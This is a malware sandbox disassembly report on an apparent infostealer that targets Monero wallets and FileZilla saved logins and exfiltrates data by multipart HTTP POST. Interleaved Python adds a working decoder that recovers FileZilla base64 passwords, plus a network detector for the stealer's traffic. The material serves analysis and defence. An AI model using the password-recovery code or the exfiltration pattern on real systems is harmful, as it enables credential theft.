                                        • API ID:
                                        • String ID: `za($}
                                        • API String ID: 0-2207082840
                                        • Opcode ID: fc21e6bcce5a687dbe64f30c91726ba6a93bf755d4269c00dd824ebb66d1b81a
                                        • Instruction ID: 97a87cf6f71500fc863f60f3cfb563e6430838f2dcba5bb679b8776729ac8642
                                        • Opcode Fuzzy Hash: fc21e6bcce5a687dbe64f30c91726ba6a93bf755d4269c00dd824ebb66d1b81a
                                        • Instruction Fuzzy Hash: 8CB2E6F3A0C204AFE7046E2DEC8567ABBEAEFD4720F16453DE6C483744EA3558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 4]%F$rV}=
                                        • API String ID: 0-1087136854
                                        • Opcode ID: 5ba433a9dd4fd2a1f78207b7b7c8ee28ee2301cecca48a0a90ed3b3c8c170d4a
                                        • Instruction ID: 50980f5828afefefa7cc211c32328d3cd0136228c0cbd66c4cc6bda19dfbd658
                                        • Opcode Fuzzy Hash: 5ba433a9dd4fd2a1f78207b7b7c8ee28ee2301cecca48a0a90ed3b3c8c170d4a
                                        • Instruction Fuzzy Hash: BA4226F390C3049FE3086F2DED8567ABBE5EF94720F1A852DEAC483744EA3559148687
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 7u$;Q}
                                        • API String ID: 0-1245395536
                                        • Opcode ID: 961c91a212692104a1bece4dd87720c892268544114cc833af9ca9776b9e4c75
                                        • Instruction ID: 0e82931bb981db10e53b1861cec83e57b251a771f16fd51ffb2017b716ce320f
                                        • Opcode Fuzzy Hash: 961c91a212692104a1bece4dd87720c892268544114cc833af9ca9776b9e4c75
                                        • Instruction Fuzzy Hash: 536116F3B096005BF3045E39DC9533AB6D7EBD8314F2B863DE68887384E93948054682
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: W.?g$|2?}
                                        • API String ID: 0-321987215
                                        • Opcode ID: 7705ac6814ba657c8501914f3a252e0a3bcf1fe4aff4018bd2bbb9bdc0347011
                                        • Instruction ID: 381c76d2a3e7436de300dd28fc9092487c598e3c14242b4603b8d8e9a3285f79
                                        • Opcode Fuzzy Hash: 7705ac6814ba657c8501914f3a252e0a3bcf1fe4aff4018bd2bbb9bdc0347011
                                        • Instruction Fuzzy Hash: 9451B1F39086109FE314BE29DC4576AFBE5EF98720F17893DD6D893290E63548448B93
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: al_]
                                        • API String ID: 0-3421114860
                                        • Opcode ID: be0c04fdc38ce49e647d7057b9e53c5fcb8e34eaa5ab731fecb11b77cfd31ef3
                                        • Instruction ID: deafe034ca6da301db84a893999b79b25a64001310dec1d220a5adb7994564ef
                                        • Opcode Fuzzy Hash: be0c04fdc38ce49e647d7057b9e53c5fcb8e34eaa5ab731fecb11b77cfd31ef3
                                        • Instruction Fuzzy Hash: 503135B3E483048BF3409E2DDC8535ABAD99F94720F2B853DD9D8D7B80E9789C058752
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8003850ef594d19525a6fcec00aec3248d50e8e2edeb43e056f24ae72f2f048d
                                        • Instruction ID: 6bfb296ca2cd51d68a92e94a577099086b7b8ae9dcbc922cb818f58141502c9e
                                        • Opcode Fuzzy Hash: 8003850ef594d19525a6fcec00aec3248d50e8e2edeb43e056f24ae72f2f048d
                                        • Instruction Fuzzy Hash: EB02E8F360C204AFE3146E29EC8577AB7E9EFD4720F1A493DEAC4C3744E97598018696
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23ad3c9d6c4881427713ba61c3a120bae78b77c1539aea6910500ba8bd70aa3b
                                        • Instruction ID: 91ac290a9d18a9fe45f875914236f828340eb5064241dc13e8f90366b0e75f40
                                        • Opcode Fuzzy Hash: 23ad3c9d6c4881427713ba61c3a120bae78b77c1539aea6910500ba8bd70aa3b
                                        • Instruction Fuzzy Hash: F1518CF3A081145FE714692DDC5573ABBD6EBD0320F2A823DDB96977C4E978080582C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb068d4137ebb2dd017403f0c1ed8ead79586f027979ad597b1c56b00f4f15fe
                                        • Instruction ID: f5b09df3d574bb6d5024e604c071f181fa4aec88770cbc666afd278ecc6cc0a5
                                        • Opcode Fuzzy Hash: eb068d4137ebb2dd017403f0c1ed8ead79586f027979ad597b1c56b00f4f15fe
                                        • Instruction Fuzzy Hash: DF5134F250C205DFD204BE28DC81A3AB3A5EBA0B10F36492DD6CA97604E675E641A773
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f841f2ecbe13936f5aafed7eb4d47db3240f4217ef3ff2aa0c85d891c571a059
                                        • Instruction ID: c6f00198d71184589dc98f8e15b6cf24e7cfaf2d20c85f469bde7aeaab9e1730
                                        • Opcode Fuzzy Hash: f841f2ecbe13936f5aafed7eb4d47db3240f4217ef3ff2aa0c85d891c571a059
                                        • Instruction Fuzzy Hash: 875136F3D086145BF3106E2AEC84766FBD6EBD0320F1B863DDEC893744EA7658058686
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                                          • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                                          • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                                          • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                                          • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                                          • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                                          • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00930DBA,00930DB7,00930DB6,00930DB3), ref: 00920362
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00920369
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00920385
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920393
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 009203CF
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 009203DD
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00920419
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920427
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00920463
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920475
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920502
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092051A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 00920532
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092054A
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00920562
                                        • lstrcat.KERNEL32(?,profile: null), ref: 00920571
                                        • lstrcat.KERNEL32(?,url: ), ref: 00920580
                                        • lstrcat.KERNEL32(?,00000000), ref: 00920593
                                        • lstrcat.KERNEL32(?,00931678), ref: 009205A2
                                        • lstrcat.KERNEL32(?,00000000), ref: 009205B5
                                        • lstrcat.KERNEL32(?,0093167C), ref: 009205C4
                                        • lstrcat.KERNEL32(?,login: ), ref: 009205D3
                                        • lstrcat.KERNEL32(?,00000000), ref: 009205E6
                                        • lstrcat.KERNEL32(?,00931688), ref: 009205F5
                                        • lstrcat.KERNEL32(?,password: ), ref: 00920604
                                        • lstrcat.KERNEL32(?,00000000), ref: 00920617
                                        • lstrcat.KERNEL32(?,00931698), ref: 00920626
                                        • lstrcat.KERNEL32(?,0093169C), ref: 00920635
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00930DB2), ref: 0092068E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: ca8ac9698af08c0c7dce13d598d73803343f029c8abc8ac4cd11a1d72a6e712c
                                        • Instruction ID: 17e54a11c66e77ff4e31d8d1aff74c70bf533161539f488a5ae17bae6228700c
                                        • Opcode Fuzzy Hash: ca8ac9698af08c0c7dce13d598d73803343f029c8abc8ac4cd11a1d72a6e712c
                                        • Instruction Fuzzy Hash: 6ED11F72900218ABCB04FBF4ED96FEE7779AF98301F504558F102B7099DE74AA06CB65
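The call sequence above (StrStrA for `<Host>`, `<Port>`, `<User>` and `<Pass encoding="base64">`, then lstrcat of `browser: FileZilla`, `profile: null`, `url: `, `login: ` and `password: ` into a heap buffer) is the sample reading `\AppData\Roaming\FileZilla\recentservers.xml` and turning each saved server into a credential record. FileZilla writes saved passwords to that file as plain base64 unless a master password is configured, in which case the element carries `encoding="crypt"` and the literal the sample searches for does not match, so those entries are skipped. The Python below is an added example, not code from the report or from the sample: it parses a constructed recentservers.xml, recovers the base64 entries, leaves the crypt entries unrecovered, and renders each record in the field order the trace shows. The separators between fields are unresolved pointers in the trace (00931678, 0093167C, 00931688, 00931698, 0093169C), so the `:` between host and port and the newline after each field are assumptions.

```python
import base64
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of %APPDATA%\FileZilla\recentservers.xml; not taken from the sandbox run.
# Entry 1: base64 password (what the sample's StrStrA literal matches).
# Entry 2: master-password protected (encoding="crypt"), which the sample does not handle.
# Entry 3: anonymous logon, no User/Pass elements at all.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass encoding="crypt" pubkey="AAAA">cXdlcnR5</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>anon.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


@dataclass
class FileZillaEntry:
    host: str
    port: str
    user: Optional[str]
    password: Optional[str]   # None when absent or not recoverable without the master password
    encoding: Optional[str]   # value of the Pass element's encoding attribute, if any


def parse_recentservers(xml_text: str) -> List[FileZillaEntry]:
    """Walk every <Server> element and pull out the four fields the sample searches for."""
    root = ET.fromstring(xml_text)
    entries: List[FileZillaEntry] = []
    for server in root.iter("Server"):
        host = server.findtext("Host", default="")
        port = server.findtext("Port", default="")
        user = server.findtext("User")
        pass_el = server.find("Pass")
        password: Optional[str] = None
        encoding: Optional[str] = None
        if pass_el is not None and pass_el.text:
            encoding = pass_el.get("encoding", "")
            if encoding == "base64":
                # Plain base64 with no key material: anyone who can read the file has the password.
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            # encoding="crypt" entries are sealed with FileZilla's master password; they are
            # deliberately left as None, mirroring the sample's base64-only literal match.
        entries.append(FileZillaEntry(host, port, user, password, encoding))
    return entries


def render_record(e: FileZillaEntry) -> str:
    """Lay the entry out in the order of the lstrcat calls in the trace.

    The ':' and '\\n' separators are assumptions; the trace only shows the prefix strings."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {e.host}:{e.port}\n"
        f"login: {e.user or ''}\n"
        f"password: {e.password or ''}\n"
    )


def recoverable_credentials(xml_text: str) -> List[FileZillaEntry]:
    """Entries an attacker with read access to the file can use directly."""
    return [e for e in parse_recentservers(xml_text) if e.user and e.password]
```

Running `recoverable_credentials` against a real `%APPDATA%\FileZilla\recentservers.xml` (and `sitemanager.xml`, which uses the same element names) is a quick way to tell whether a host that ran this sample has exposed FTP credentials that now need rotating; an empty result with crypt entries present means the master password held.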
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009159F8
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00915A13
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00915B93
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,006BE998,00000000,?,006BA300,00000000,?,00931A1C), ref: 00915E71
                                        • lstrlen.KERNEL32(00000000), ref: 00915E82
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00915E93
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00915E9A
                                        • lstrlen.KERNEL32(00000000), ref: 00915EAF
                                        • lstrlen.KERNEL32(00000000), ref: 00915ED8
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00915EF1
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00915F1B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00915F2F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00915F4C
                                        • InternetCloseHandle.WININET(00000000), ref: 00915FB0
                                        • InternetCloseHandle.WININET(00000000), ref: 00915FBD
                                        • HttpOpenRequestA.WININET(00000000,006BEA78,?,006BE230,00000000,00000000,00400100,00000000), ref: 00915BF8
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • InternetCloseHandle.WININET(00000000), ref: 00915FC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------$0k$xk
                                        • API String ID: 874700897-1840268369
                                        • Opcode ID: 91fc445e031691466a2efe776fd31099e68a2023924f5c1673feb997971c4ed1
                                        • Instruction ID: 23639cd5d8948d6d5edf1cd64ff3d887ae812cf90004cfa2c45df533a91396ec
                                        • Opcode Fuzzy Hash: 91fc445e031691466a2efe776fd31099e68a2023924f5c1673feb997971c4ed1
                                        • Instruction Fuzzy Hash: 1212EF72921128ABDB15EBA0EC96FEEB378BF94700F504199F10673095EF702A49CF65
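In the function above, InternetOpenA is called with a NULL agent string (first argument 00000000) and INTERNET_OPEN_TYPE_DIRECT (1), InternetConnectA with service type 3 (INTERNET_SERVICE_HTTP), and HttpOpenRequestA with flags 0x00400100, which decode to INTERNET_FLAG_KEEP_CONNECTION (0x00400000) | INTERNET_FLAG_PRAGMA_NOCACHE (0x00000100). A NULL agent makes WinINet send the request without a User-Agent header, and those two flags are normally emitted as `Connection: Keep-Alive` and `Pragma: no-cache`. Together with the `"` and `------` constants, which are the pieces of a multipart/form-data body and its boundary, this is a usable network-side fingerprint. The Python below is an added example, not code from the report: it parses a constructed HTTP request (not a capture from this run; the host, path, field name and boundary suffix are placeholders) and reports which of those three traits it exhibits, and shows that a normal browser upload, which carries a User-Agent and a `----WebKit`-style boundary, does not match. A missing User-Agent alone is common for native Windows tooling, so treat the traits as a combined score rather than as individual alerts.

```python
from typing import Dict, List, Optional, Tuple


def build_request(request_line: str, headers: List[Tuple[str, str]], body: bytes) -> bytes:
    """Assemble a raw HTTP/1.1 request with a correct Content-Length."""
    head = request_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers)
    head += f"Content-Length: {len(body)}\r\n\r\n"
    return head.encode("latin-1") + body


# Constructed request. Only the "------" boundary prefix, the quoted field name, the absent
# User-Agent and the two headers implied by flags 0x00400100 come from the trace; everything
# else (host, path, field name, value, boundary suffix) is an invented placeholder.
_MAL_BOUNDARY = "------XyZq7"
_MAL_BODY = (
    f"--{_MAL_BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n'
    "\r\n"
    "0123456789ABCDEF\r\n"
    f"--{_MAL_BOUNDARY}--\r\n"
).encode()
SAMPLE_REQUEST = build_request(
    "POST /index.php HTTP/1.1",
    [("Host", "c2.example.test"),
     ("Content-Type", f"multipart/form-data; boundary={_MAL_BOUNDARY}"),
     ("Pragma", "no-cache"),
     ("Connection", "Keep-Alive")],
    _MAL_BODY,
)

# Constructed benign control: a browser file upload.
_BROWSER_BOUNDARY = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
BENIGN_REQUEST = build_request(
    "POST /upload HTTP/1.1",
    [("Host", "files.example.test"),
     ("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"),
     ("Content-Type", f"multipart/form-data; boundary={_BROWSER_BOUNDARY}")],
    (f"--{_BROWSER_BOUNDARY}\r\n"
     'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n\r\n'
     "hello\r\n"
     f"--{_BROWSER_BOUNDARY}--\r\n").encode(),
)


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw request into its request line, a lower-cased header map and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def multipart_boundary(headers: Dict[str, str]) -> Optional[str]:
    """Return the boundary parameter of a multipart/form-data Content-Type, else None."""
    ctype = headers.get("content-type", "")
    if not ctype.lower().startswith("multipart/form-data"):
        return None
    for param in ctype.split(";")[1:]:
        key, _, value = param.strip().partition("=")
        if key.lower() == "boundary":
            return value.strip('"')
    return None


def wininet_stealer_indicators(raw: bytes) -> List[str]:
    """List the traits from the trace that this request exhibits (empty list = none)."""
    request_line, headers, body = parse_request(raw)
    method = request_line.split(" ", 1)[0].upper()
    reasons: List[str] = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent (InternetOpenA called with a NULL agent)")
    boundary = multipart_boundary(headers)
    if (method == "POST" and boundary and boundary.startswith("------")
            and body.count(f"--{boundary}".encode()) >= 2):
        reasons.append("multipart POST with a '------'-prefixed boundary")
    if (headers.get("pragma", "").lower() == "no-cache"
            and headers.get("connection", "").lower() == "keep-alive"):
        reasons.append("Pragma: no-cache + Connection: Keep-Alive (HttpOpenRequestA flags 0x00400100)")
    return reasons
```

The boundary check requires the `--boundary` delimiter to appear at least twice in the body so that a bare Content-Type header with no multipart payload does not score; on real traffic feed `wininet_stealer_indicators` the reassembled request bytes from a PCAP or proxy log and alert when all three traits are present together.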
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,006BA330,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091CF83
